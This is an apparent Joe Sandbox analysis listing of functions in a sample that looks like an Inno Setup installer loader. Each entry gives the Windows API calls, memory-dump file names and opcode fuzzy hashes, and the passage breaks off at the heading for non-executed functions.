LoadLibraryA.KERNEL32(00000000,00000000,00406E48,?,00000000,00406E66,?,00008000), ref: 00406E2D

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: b3393015f1b4cf888f94ac6815341bd1027e86fadb80852e539b0537c044c6ba
Instruction ID: c0beb44b57a6fed944bfd097530307aaa8a821c5429653af2602c50d3bc0072e
Opcode Fuzzy Hash: b3393015f1b4cf888f94ac6815341bd1027e86fadb80852e539b0537c044c6ba
Instruction Fuzzy Hash: 2DF08275A14704BFDB125F76DC6282BBBACE749F0075348B6F910A26D1E53C892085A8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E9E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64

Part of subcall function 004091A4: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$DirectoryE69840RemoveSleep
String ID:
API String ID: 2747185952-0
Opcode ID: a868a6e5d00a0acde263f6599406e2a8c040d2c0d3f70bd5f57d2dc34d7e2dd5
Instruction ID: e69e0b332c88c819040577c0555826280b0c87ea955f984b77490ea3e21026c3
Opcode Fuzzy Hash: a868a6e5d00a0acde263f6599406e2a8c040d2c0d3f70bd5f57d2dc34d7e2dd5
Instruction Fuzzy Hash: A7F0CD702102019BD725EB65EE49B6673A4EF84305F14483BE204763E2C7BD5C90DBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00407424 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00407443
GetLastError.KERNEL32(?,?,?,00000000), ref: 0040744B

Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: e46534d7d6c06c2f98e8bee60b66bb92ee3723b23284c2abdcea7b00b07b3c78
Instruction ID: 9939ab9056f0822041df34d86dac8fc00f3a42cdeedc0b59fd8d9b3697e95dde
Opcode Fuzzy Hash: e46534d7d6c06c2f98e8bee60b66bb92ee3723b23284c2abdcea7b00b07b3c78
Instruction Fuzzy Hash: A4E092B66082006BD600F99DC881A9B37DCDF85364F01413ABA68EB1C2D675AC00C376

Uniqueness

Uniqueness Score: -1.00%

Function 004073A4 Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,004073F8,?,0040BDE0,?,004098F1,00000000,00409E99), ref: 004073BB
GetLastError.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,004073F8,?,0040BDE0,?,004098F1,00000000,00409E99), ref: 004073CA

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: e914567cb13969067943345982a8a313c8c116114bd4ea159f247cfbe41961e0
Instruction ID: 13490c32c9f7ee086a49088034a9beb1796989a54081e25f46ccf46c3bbabe17
Opcode Fuzzy Hash: e914567cb13969067943345982a8a313c8c116114bd4ea159f247cfbe41961e0
Instruction Fuzzy Hash: 1BE06DA16081506AEB24A65AA884E6B67DC8BC5325F05807BFE04DA281D6B8DC00D376

Uniqueness

Uniqueness Score: -1.00%

Function 00407288 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00409F09,00000001,00000000,00000001,00407803,?,0040BDE0,?), ref: 0040729F
GetLastError.KERNEL32(?,00000000,00409F09,00000001,00000000,00000001,00407803,?,0040BDE0,?), ref: 004072AB

Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 727037b0f09b88640473c885d25518507a72e987a24e9ef388c6271a82f97a39
Instruction ID: f446756f45e5f2ba1f545924375f0d55a30696ac3283ac729030538f8c345fd2
Opcode Fuzzy Hash: 727037b0f09b88640473c885d25518507a72e987a24e9ef388c6271a82f97a39
Instruction Fuzzy Hash: 9BE04FB16006109FEB10EEB98881B6273D8AF05364F0585BAFA24DF2C5D274DC00C765

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
Instruction ID: 0a9bdec6e0d4ada2bc80af5311ae0c0d9c5226b5e0cec20c8283fd4eb37d5a7f
Opcode Fuzzy Hash: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
Instruction Fuzzy Hash: 0FF02772B0032017DB20696A0CC1B536AC59F85B90F1540BBFA4CFF3FAD2B98C0042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040524C Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00405382), ref: 0040526B

Part of subcall function 00404CA8: LoadStringA.USER32 ref: 00404CC5

Part of subcall function 004051D8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: cb0487420b3172c234957d8210b1a1e7d96addb770309c7ff4572b3558b5ad4f
Instruction ID: 5ab3b431dc833c381f6376774c2282f43a01c3060f713a21c8c4142fa45d119f
Opcode Fuzzy Hash: cb0487420b3172c234957d8210b1a1e7d96addb770309c7ff4572b3558b5ad4f
Instruction Fuzzy Hash: 80316D75E00109ABCB00EF95CC809EEB379FF84304F518577E815BB285E739AE018B98

Uniqueness

Uniqueness Score: -1.00%

Function 004067D8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040685E,00000000,00406884,?,?,?,?,00000000,?,00406899), ref: 00406800

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 8c931f58bc880db98d68e9c8f4dbceab4e5d30aa373b7925f51b50f0d4df4d8b
Instruction ID: cd3b748fd999092e0dd41bd66ea10e28c532175b200e518a919150fcc3457b7d
Opcode Fuzzy Hash: 8c931f58bc880db98d68e9c8f4dbceab4e5d30aa373b7925f51b50f0d4df4d8b
Instruction Fuzzy Hash: A3F0BE523019241BC6117A7F18818AF66CC8B8574D742817FF502EB382ED3DAE1362AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040723A Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040727C

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadca9e125a753c57296c915bcb0ab55ba595cf73d81ce89ea44cdbc5a070b64
Instruction ID: 5bd8415a33b32774670a026ed371ba3c899a528441b6bf43d5ab29e5e2c7c723
Opcode Fuzzy Hash: aadca9e125a753c57296c915bcb0ab55ba595cf73d81ce89ea44cdbc5a070b64
Instruction Fuzzy Hash: 92E0E5753442483EE380AAFCAD42FA667DC970A714F008022B998EB281D9759D219AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040683C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 004067D8: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040685E,00000000,00406884,?,?,?,?,00000000,?,00406899), ref: 00406800

6CF478A0.KERNEL32(00000000,00000000,00406884,?,?,?,?,00000000,?,00406899,00406BD3,00000000,00406C18,?,?,?), ref: 00406867

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharF478Prev
String ID:
API String ID: 808134145-0
Opcode ID: 4eec67744853805212579f3f2e131bb21c27f24265a6f9aeaabd8a63ef93bdb4
Instruction ID: cf8619df364c692642b75c2ad68c5631abdbe379fd6a5d417733308921cf3789
Opcode Fuzzy Hash: 4eec67744853805212579f3f2e131bb21c27f24265a6f9aeaabd8a63ef93bdb4
Instruction Fuzzy Hash: 8DE06531204304BFD701FA629C5295AB7ECD789748B924876B905B7581D5785E108568

Uniqueness

Uniqueness Score: -1.00%

Function 00407480 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,02057D98,000BE200,?,00000000,000BE200,?,?,02057D98,00409CCE), ref: 00407497

Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
Instruction ID: 38cc9a4b820c908ade272dde7143f440ba8a68471926a725f46627d21603aec7
Opcode Fuzzy Hash: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
Instruction Fuzzy Hash: 1CE012727081107BD720E65ED880E5B67DCDFC5764F00407BBA04EB281D578AC049776

Uniqueness

Uniqueness Score: -1.00%

Function 0040723C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040727C

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720fa26f6d7c147ae79ffad1078871bf0afb9153a9a3787685cc00f5a5ad9a0b
Instruction ID: aa70f73b4ad7123efe22fc05ec8d864e060c25a8f4bd804b8909c9a15069892f
Opcode Fuzzy Hash: 720fa26f6d7c147ae79ffad1078871bf0afb9153a9a3787685cc00f5a5ad9a0b
Instruction Fuzzy Hash: 6AE01A753442483EE380EEFCAD42FA677DC970A714F008022B998EB381D9759D219BB9

Uniqueness

Uniqueness Score: -1.00%

Function 004070D8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00408DCB,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004070F7

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 49433d0f93936c3e5235eb52ca7e2b20e5004c0b9c26b20b11e93211e7aeeb57
Instruction ID: 3e9af00247863558707ead0c9bedca69137528a3dbc213c9ebd51d15e106523e
Opcode Fuzzy Hash: 49433d0f93936c3e5235eb52ca7e2b20e5004c0b9c26b20b11e93211e7aeeb57
Instruction Fuzzy Hash: 66E0D8B178C30125F22500644C47F76520947C0704F20813A3710EE3E2D9BEB906115F

Uniqueness

Uniqueness Score: -1.00%

Function 00407464 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,02057D98,00409CB0), ref: 0040746B

Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 0617febd3252712e40b0bf1ced51356aff65a3d5f8e53557862437d7bb07380b
Instruction ID: a2612de60f5c6a42fed200a765be981a26f664ba087cc82ebbfa88963db20d0e
Opcode Fuzzy Hash: 0617febd3252712e40b0bf1ced51356aff65a3d5f8e53557862437d7bb07380b
Instruction Fuzzy Hash: EBC04CE560421157DB00EAAA89C190667DC5A482593014076FA14DF256D678E8009619

Uniqueness

Uniqueness Score: -1.00%

Function 00406E4F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406E6D), ref: 00406E60

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a56ca0b8faf8d1e330e126b017f71b34cc6a81dc34f8c707e1e286838e3cde92
Instruction ID: c16e80c3071607a55ceed432c86fff4652f516d6b34bf8a23abf834d9a37f925
Opcode Fuzzy Hash: a56ca0b8faf8d1e330e126b017f71b34cc6a81dc34f8c707e1e286838e3cde92
Instruction Fuzzy Hash: 4DB09B7A70C3006FE705ABA5FC1142863D4D7C4B107E24877F110D25C1D53C54104618

Uniqueness

Uniqueness Score: -1.00%

Function 00406E6B Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406E6D), ref: 00406E60

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: afb7a3705be87c655b88a01161792b2ff533eda17e129e871f6243dd462d7bce
Instruction ID: daf783ab61578579cf625219c76c2fc0142693dae816566a5d16650f7a9fa9bd
Opcode Fuzzy Hash: afb7a3705be87c655b88a01161792b2ff533eda17e129e871f6243dd462d7bce
Instruction Fuzzy Hash: FDA022ACC00300B3CE00B3E8C83082C23282A88F003E208AA3322B20C0C03E80000208

Uniqueness

Uniqueness Score: -1.00%

Function 004015C4 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401631

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
Instruction ID: 8a4128db402ff564317842b1528136efc943efb3ec0006f7d13b38747f41841c
Opcode Fuzzy Hash: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
Instruction Fuzzy Hash: 41113CB2A057019FC3109F29CD80A1BB7E5EBC4760F19C93DE598A73A5D736AC408699

Uniqueness

Uniqueness Score: -1.00%

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,?,?,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
Instruction ID: 16a4501794763894d112e8f61db517d820fca643a48b443a7e05d48f47cfc21a
Opcode Fuzzy Hash: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
Instruction Fuzzy Hash: B501A7726443144BC310AF28DDC092A77D5DB85364F19497ED985B73A2D33B6C0587EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040720A Relevance: 1.3, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040721C

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e00d840cbfc5ea24e9f986c1a7855b527cb7041839e6c9887e7e6ca8da466a72
Instruction ID: 85bc6db19389d6a952aef3f805f65b257ae3a7b44276564e27daf6f5ee319632
Opcode Fuzzy Hash: e00d840cbfc5ea24e9f986c1a7855b527cb7041839e6c9887e7e6ca8da466a72
Instruction Fuzzy Hash: 69D02E81B00A6017E311F6FF088875682C84F88644B08847EFA48E33C1D67CEC01838A

Uniqueness

Uniqueness Score: -1.00%

Function 00407BC4 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407D01), ref: 00407BE0

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
Instruction ID: 2a6adca33b943734a4b37ef61053050b2fe8d794beb6ab185d3a086b925497b7
Opcode Fuzzy Hash: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
Instruction Fuzzy Hash: B5D09EB1B142005FDB94DF794CC1B0336D87B08600B2184766908DB286F774E5108B58

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040910C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

